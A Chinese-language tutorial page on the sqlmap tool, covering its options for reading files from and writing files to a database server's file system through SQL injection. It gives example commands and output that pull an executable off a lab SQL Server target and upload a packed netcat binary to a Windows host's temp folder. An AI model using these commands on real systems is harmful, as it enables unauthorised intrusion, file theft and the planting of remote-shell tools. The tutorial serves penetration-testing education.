<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>
    SqlMap中文版使用教程
    展開或關閉
    第一章. SqlMap介紹
    1.1 SqlMap簡介 1.2 SqlMap支持的五種不同注入模式 1.3 SqlMap功能
    第二章. SqlMap安裝
    2.1 SqlMap 的下載和更新 2.2 SqlMap的安裝教程
    第三章. SqlMap用法
    3.1 SqlMap用法—輸出級別(Output verbosity) 3.2 SqlMap用法—目標 3.3 SqlMap用法—請求 3.4 SqlMap用法—繞過反CSRF保護 3.5 SqlMap用法—優化 3.6 SqlMap用法—注入 3.7 SqlMap用法—檢測 3.8 SqlMap用法—注入技術 3.9 SqlMap用法—指紋 3.10 SqlMap用法—枚舉 3.11 SqlMap用法—暴力破解 3.12 SqlMap用法—用戶定義的功能注入 3.13 SqlMap用法—文件系統訪問 3.14 SqlMap用法—操作系統控制 3.15 SqlMap用法—注冊表訪問 3.16 SqlMap用法—通用選項 3.17 SqlMap用法—雜項
    第四章. SqlMap使用實例
    4.1 SqlMap之POST登陸框注入實戰 4.2 SqlMap之Mysql注入實戰 SqlMap之Access注入實戰

    3.13 SqlMap用法—文件系統訪問

    SqlMap中文版使用教程 /

    3.13.1.從數據庫服務器的文件系統讀取文件

    選項: --file-read

    當后端數據庫管理系統是MySQL,PostgreSQL或Microsoft SQL Server,并且會話用戶具有濫用數據庫特定功能和體系結構弱點所需的特權時,可以從基礎文件系統中檢索文件的內容。指定的文件可以是文本文件或二進制文件。sqlmap將正確處理它。

    這些技術在白皮書“ 高級SQL注入到操作系統的完全控制”中有詳細介紹。

    針對Microsoft SQL Server 2005目標以檢索二進制文件的示例:

    $ python sqlmap.py -u "http://192.168.136.129/sqlmap/mssql/iis/get_str2.asp?nam
e=luther" --file-read "C:/example.exe" -v 1

[...]
[hh:mm:49] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2000
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2005

[hh:mm:50] [INFO] fetching file: 'C:/example.exe'
[hh:mm:50] [INFO] the SQL query provided returns 3 entries
C:/example.exe file saved to:    '/software/sqlmap/output/192.168.136.129/files/
C__example.exe'
[...]

$ ls -l output/192.168.136.129/files/C__example.exe 
-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.129/files/C_
_example.exe

$ file output/192.168.136.129/files/C__example.exe 
output/192.168.136.129/files/C__example.exe: PE32 executable for MS Windows (GUI
) Intel 80386 32-bit

    3.13.2.將文件上傳到數據庫服務器的文件系統

    選項:--file-write--file-dest

    當后端數據庫管理系統是MySQL,PostgreSQL或Microsoft SQL Server,并且會話用戶具有濫用數據庫特定功能和體系結構弱點所需的特權時,可以將本地文件上載到數據庫服務器的文件系統。指定的文件可以是文本文件或二進制文件。sqlmap將正確處理它。

    針對MySQL目標上傳二進制UPX壓縮文件的示例:

    $ file /software/nc.exe.packed 
/software/nc.exe.packed: PE32 executable for MS Windows (console) Intel 80386 32
-bit

$ ls -l /software/nc.exe.packed
-rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /software/nc.exe.packed

$ python sqlmap.py -u "http://192.168.136.129/sqlmap/mysql/get_int.aspx?id=1" -
-file-write "/software/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1

[...]
[hh:mm:29] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or 2008
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: MySQL >= 5.0.0

[...]
do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been success
fully written on the back-end DBMS file system? [Y/n] y
[hh:mm:52] [INFO] retrieved: 31744
[hh:mm:52] [INFO] the file has been successfully written and its size is 31744 b
ytes, same size as the local file '/software/nc.exe.packed'

    本文章首發在 網安wangan.com 網站上。

    上一篇 下一篇
    Ann
    資深作者 203 聲望
    暫無個人描述~
    討論數量: 0
    只看當前版本


    暫無話題~
    ? 2021 WANGAN.COM 幫助網安從業者成長;關注產業發展,做網絡安全忠誠衛士!
    亚洲 欧美 自拍 唯美 另类